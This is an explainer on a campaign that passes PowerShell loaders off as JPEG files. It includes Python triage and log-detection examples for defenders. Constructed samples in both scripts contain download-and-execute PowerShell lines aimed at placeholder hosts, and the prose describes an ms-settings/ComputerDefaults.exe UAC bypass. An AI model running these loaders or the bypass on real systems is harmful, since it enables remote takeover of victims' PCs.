
How Hackers Hide Trojans Inside Image Files to Compromise Your PC


Operation SilentCanvas: When JPEGs Become Trojan Horses

That innocent “sysupdate.jpeg” in your downloads folder may not be a photo at all. In Operation SilentCanvas, attackers disguise malicious PowerShell scripts as JPEG image files to slip past basic Windows security checks. The samples lack a valid JPEG header (a real JPEG begins with the bytes FF D8 FF), so they are not images at all; the .jpeg name is there to look harmless to users and to pass filters that trust file extensions. An image viewer will simply fail to render such a file; it does damage only when a launcher hands it to PowerShell, at which point the fake image acts as a loader that installs a remote access trojan and gives the attacker a foothold on the victim’s system. Because users inherently trust common formats like JPEG, malicious image files are an effective social‑engineering tool. This Windows security bypass technique is part of a broader trend in which attackers abuse everyday file types to sneak dangerous payloads onto PCs while giving signature‑based antivirus very little to match on.

How Fake JPEGs Launch PowerShell and Remote Access Trojans

Operation SilentCanvas uses a multi‑stage attack chain that blends scripting, living‑off‑the‑land techniques, and dual‑format tricks. The disguised JPEG is actually a PowerShell script, sometimes paired with file extension spoofing so it shows up as a normal image in Explorer and in mail clients. When executed, it creates a hidden C:\Systems folder and downloads a trojanized ScreenConnect package from a remote server over an encrypted connection on the non‑standard TCP port 5443. The package is dropped into C:\ProgramData\OneDriveServer\, a path named to blend in with Microsoft software. Because ScreenConnect is a legitimate remote management tool, its built‑in screen viewing, input capture, microphone and camera access, and clipboard and file transfer serve as the remote access trojan without the attackers dropping a custom malware binary. A secondary “access.jpeg” payload is then fetched and run entirely in memory, so it never lands on disk where file‑based antivirus signatures would see it. By chaining these steps, the attackers gain persistent, stealthy control without relying on the obvious binaries that security products typically monitor.
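As an added example (this is not code from the original article or from any report on SilentCanvas), the following Python script triages a file that carries a .jpeg name: it checks for the JPEG start‑of‑image marker FF D8 FF, scans for tokens a PowerShell downloader can hardly be written without, and reports a verdict. It goes one step beyond the article by also handling the dual‑format case, a genuine JPEG header with script text tucked into a COM segment. The marker list and the three sample files are constructed for the demonstration; the example.invalid URLs are placeholders, not the campaign's infrastructure.

```python
import re

# A real JPEG starts with the SOI marker FF D8 followed by another marker (FF xx)
# and ends with the EOI marker FF D9.
JPEG_SOI = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"

# Tokens a PowerShell downloader/loader is hard to write without. The list is an
# assumption for this demo, not a vendor signature set; matched case-insensitively.
SCRIPT_MARKERS = [
    ("Invoke-Expression", rb"invoke-expression"),
    ("IEX", rb"\biex\b"),
    ("Net.WebClient", rb"net\.webclient"),
    ("DownloadString/DownloadFile", rb"download(string|file)"),
    ("Invoke-WebRequest", rb"invoke-webrequest|\biwr\b"),
    ("-EncodedCommand", rb"-encodedcommand"),
    ("FromBase64String", rb"frombase64string"),
    ("Start-Process", rb"start-process"),
    ("New-ItemProperty", rb"new-itemproperty"),
]


def find_script_markers(data: bytes) -> list:
    """Return the names of loader tokens present anywhere in the file."""
    low = data.lower()  # bytes.lower() folds ASCII only, which is all these tokens need
    return [name for name, pat in SCRIPT_MARKERS if re.search(pat, low)]


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII or whitespace: text is ~1.0, image data is low."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data)


def triage(name: str, data: bytes) -> dict:
    """Classify a file that may be masquerading as an image."""
    claims_image = name.lower().endswith((".jpg", ".jpeg"))
    has_soi = data.startswith(JPEG_SOI)
    markers = find_script_markers(data)
    if has_soi and not markers:
        verdict = "jpeg"        # looks like a picture and contains no script tokens
    elif has_soi:
        verdict = "polyglot"    # valid image header but script text inside: the dual-format case
    elif markers:
        verdict = "script"      # no image header at all: a script wearing a .jpeg name
    else:
        verdict = "unknown"
    return {
        "name": name,
        "verdict": verdict,
        "suspicious": claims_image and verdict != "jpeg",
        "markers": markers,
        "printable_ratio": round(printable_ratio(data), 2),
    }


def jpeg_with_comment(comment: bytes) -> bytes:
    """Build a JPEG-shaped byte string (SOI, JFIF APP0, COM, EOI) whose COM segment holds `comment`.
    Segment lengths include the two length bytes, as the JPEG format requires."""
    app0 = b"\xff\xe0" + b"\x00\x10" + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    com = b"\xff\xfe" + (len(comment) + 2).to_bytes(2, "big") + comment
    return b"\xff\xd8" + app0 + com + JPEG_EOI


# --- constructed samples (not real campaign files) ------------------------------
REAL_JPEG_STUB = (
    b"\xff\xd8" + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\x00\x01\x80\xfe" * 16 + JPEG_EOI   # stand-in for entropy-coded scan data
)
FAKE_JPEG = (
    b"# constructed loader text with a .jpeg name; URLs are placeholders\r\n"
    b"New-Item -ItemType Directory -Force 'C:\\Systems' | Out-Null\r\n"
    b"(New-Object Net.WebClient).DownloadFile('https://example.invalid/sc.zip', 'C:\\Systems\\sc.zip')\r\n"
    b"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/access.jpeg')\r\n"
)
POLYGLOT = jpeg_with_comment(b"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')")

if __name__ == "__main__":
    for n, d in (("photo.jpg", REAL_JPEG_STUB), ("sysupdate.jpeg", FAKE_JPEG), ("access.jpeg", POLYGLOT)):
        print(triage(n, d))
```

The header check alone catches the SilentCanvas samples, which have no JPEG header at all; the marker scan is what catches a polyglot, since a valid header says nothing about what sits in the comment or trailing bytes. The printable ratio is a cheap tie‑breaker for files with no recognisable header: near 1.0 means text, not a photo.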

Windows Security Bypass Through Registry Hijacking and Dual Formats

To gain administrative rights without a prompt, Operation SilentCanvas goes beyond simple scripting tricks. The loader hijacks the ms-settings registry key, the per‑user handler for the ms-settings: protocol that lives under HKCU\Software\Classes and can be written without any privileges, and then launches ComputerDefaults.exe, a Microsoft‑signed binary that Windows auto‑elevates and that opens that protocol handler when it starts. The hijacked command therefore runs at high integrity with no User Account Control (UAC) dialog and no user awareness. Two caveats matter for defenders: the trick only works when the logged‑in user is already a member of the Administrators group (UAC is not a security boundary, so this is medium‑to‑high integrity, not standard user to admin), and the same registry path is abused by other well‑known UAC bypasses, so an existing alert on writes under HKCU\Software\Classes\ms-settings should fire here too. Within about two seconds the script deletes the key again, erasing the most obvious trace of this Windows security bypass. Alongside this, the attackers rely on extension spoofing and dual‑format files: PowerShell reads a file's text regardless of its extension, so a file that a mail gateway or a user treats as a .jpeg behaves as a script the moment it reaches the interpreter. Because many defenses still key on file signatures and extensions, this dual‑format exploitation lets malicious image files slip past filters that only scan for obvious executable types. The result is a remote access trojan deployment that appears to originate from harmless media files, which makes investigation and incident response harder for everyday users and even for some security teams.

Phishing Lures: Fake Notices and Software Updates

The technical tricks of Operation SilentCanvas would be useless without effective delivery. Attackers primarily rely on phishing emails to place these JPEG trojan malware files on victims’ systems. Common lures include messages impersonating Social Security Administration notifications and bogus software update prompts, both designed to pressure users into quickly opening attachments. The weaponized JPEG or update file arrives as part of these emails, often accompanied by convincing branding and formal language to lower suspicion. This campaign also aligns with broader trends like ClickFix, where attackers hide shellcode inside PNG images on fake Windows Update pages using steganography. In all cases, the goal is the same: use trusted visuals and familiar update scenarios to trick recipients into executing malicious image files. Once that happens, the remote access trojan chain begins, often without any obvious visual sign that something went wrong.

How to Detect and Prevent Malicious Image Files

Protecting yourself from Operation SilentCanvas and similar campaigns requires a mix of technical controls and careful habits. On the technical side, turn on PowerShell Script Block Logging (Event ID 4104) and Module Logging, and alert on script hosts such as powershell.exe, pwsh.exe, cmd.exe and wscript.exe launched with a command line that reads a .jpeg or .jpg file, on ComputerDefaults.exe being spawned by a script host, and on any write under HKCU\Software\Classes\ms-settings. Use application control (WDAC or AppLocker) to block abuse of system binaries such as csc.exe and ComputerDefaults.exe where your environment does not need them, and tightly control remote management tools like ScreenConnect: allow only your own instance, and treat a client that runs outside Program Files or talks to a server you do not recognise as an incident. Egress filtering helps as well; an endpoint opening TCP 5443 to an unfamiliar address deserves a look. On the user side, treat unsolicited attachments and update prompts with skepticism, particularly if they claim to be urgent notices or system fixes; genuine Windows updates arrive through Windows Update, not as email attachments or files named like images. Avoid double‑clicking files directly from email; save and scan them with up‑to‑date security tools, and remember that an “image” that fails to open in an image viewer is itself a warning sign. Regularly check for suspicious directories like C:\Systems and C:\ProgramData\OneDriveServer\, and if you suspect exposure, assume that credentials typed or stored on the machine were captured and rotate them, uninstall any remote access software you did not install yourself, and perform a full system scan to root out any lingering remote access trojan components.
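As an added example that ties the UAC bypass section and the detection advice above together (not the article's own code, and not a vendor rule set), the following Python snippet runs a handful of detection rules over telemetry for this chain: Sysmon process creation (ID 1), network connection (ID 3), registry key delete (ID 12) and registry value set (ID 13), plus PowerShell script block logging (ID 4104). It also correlates a write under ms-settings with a delete of the same key seconds later, the self‑cleaning step the article describes. The events are constructed to look like Sysmon records after a collector has flattened them to dicts; the field names follow Sysmon's and are assumed to survive your collector unchanged, the SID and IP addresses are placeholders, and the ScreenConnect service binary name is assumed for the drop directory sample.

```python
from datetime import datetime, timedelta

TS = "%Y-%m-%d %H:%M:%S.%f"   # Sysmon UtcTime layout

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
SUSPECT_PATHS = ("c:\\systems", "c:\\programdata\\onedriveserver")   # drop directories from the article
MS_SETTINGS_KEY = "\\software\\classes\\ms-settings\\shell\\open\\command"
CLEANUP_WINDOW = timedelta(seconds=10)   # article says ~2 s; a wider window tolerates clock jitter


def _base(image: str) -> str:
    """Lower-cased file name of a full image path."""
    return image.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, UtcTime) findings in event order."""
    findings = []
    key_set_at = {}   # lower-cased TargetObject of ms-settings writes -> when it was written
    for ev in events:
        eid = ev["EventID"]
        t = datetime.strptime(ev["UtcTime"], TS)
        if eid == 13 and MS_SETTINGS_KEY in ev["TargetObject"].lower():
            findings.append(("ms-settings handler written (UAC bypass setup)", ev["UtcTime"]))
            key_set_at[ev["TargetObject"].lower()] = t
        elif eid == 12 and ev.get("EventType") == "DeleteKey":
            k = ev["TargetObject"].lower()
            # the value lives under ...\Shell\Open\command; cleanup usually deletes a parent key
            for written, when in key_set_at.items():
                if written.startswith(k) and t - when <= CLEANUP_WINDOW:
                    findings.append(("ms-settings key deleted seconds after write (cleanup)", ev["UtcTime"]))
        elif eid == 1:
            img, parent = _base(ev["Image"]), _base(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "").lower()
            if img == "computerdefaults.exe" and parent in SCRIPT_HOSTS:
                findings.append(("auto-elevating ComputerDefaults.exe spawned by script host", ev["UtcTime"]))
            if img in SCRIPT_HOSTS and (".jpeg" in cmd or ".jpg" in cmd):
                findings.append(("script host handed a .jpeg/.jpg file", ev["UtcTime"]))
            if any(p in ev["Image"].lower() for p in SUSPECT_PATHS):
                findings.append(("process running from SilentCanvas drop directory", ev["UtcTime"]))
        elif eid == 3 and ev.get("DestinationPort") == 5443:
            findings.append(("outbound TCP 5443 from %s" % _base(ev["Image"]), ev["UtcTime"]))
        elif eid == 4104:
            text = ev["ScriptBlockText"].lower()
            if any(p in text for p in SUSPECT_PATHS) or ".jpeg" in text:
                findings.append(("PowerShell script block references drop dir or .jpeg payload", ev["UtcTime"]))
    return findings


# --- constructed telemetry (not real logs): one infection plus two benign events ----
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2025-03-04 09:15:01.000", "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -ep bypass -c \"IEX ([IO.File]::ReadAllText('C:\\Users\\u\\Downloads\\sysupdate.jpeg'))\""},
    {"EventID": 13, "UtcTime": "2025-03-04 09:15:03.200",
     "TargetObject": "HKU\\S-1-5-21-1000\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\(Default)"},
    {"EventID": 1, "UtcTime": "2025-03-04 09:15:03.400", "Image": "C:\\Windows\\System32\\ComputerDefaults.exe",
     "ParentImage": PS, "CommandLine": "ComputerDefaults.exe"},
    {"EventID": 12, "UtcTime": "2025-03-04 09:15:05.100", "EventType": "DeleteKey",
     "TargetObject": "HKU\\S-1-5-21-1000\\Software\\Classes\\ms-settings"},
    {"EventID": 3, "UtcTime": "2025-03-04 09:15:20.000", "Image": PS,
     "DestinationIp": "203.0.113.10", "DestinationPort": 5443},
    {"EventID": 1, "UtcTime": "2025-03-04 09:15:41.000",
     "Image": "C:\\ProgramData\\OneDriveServer\\ScreenConnect.ClientService.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "C:\\ProgramData\\OneDriveServer\\ScreenConnect.ClientService.exe"},
    {"EventID": 4104, "UtcTime": "2025-03-04 09:15:45.000",
     "ScriptBlockText": "$b=(New-Object Net.WebClient).DownloadString('https://example.invalid/access.jpeg'); IEX $b"},
    {"EventID": 1, "UtcTime": "2025-03-04 09:16:00.000", "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe C:\\Users\\u\\Desktop\\notes.txt"},
    {"EventID": 3, "UtcTime": "2025-03-04 09:16:02.000", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]

if __name__ == "__main__":
    for rule, when in detect(SAMPLE_EVENTS):
        print(when, rule)
```

Each rule on its own is noisy in a large estate (a script host touching a .jpg path can be a legitimate image‑processing job), which is why the write‑then‑delete correlation and the ComputerDefaults.exe parent check are the two worth paging on; the rest are best used to enrich that alert with the download, drop directory and port 5443 context.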
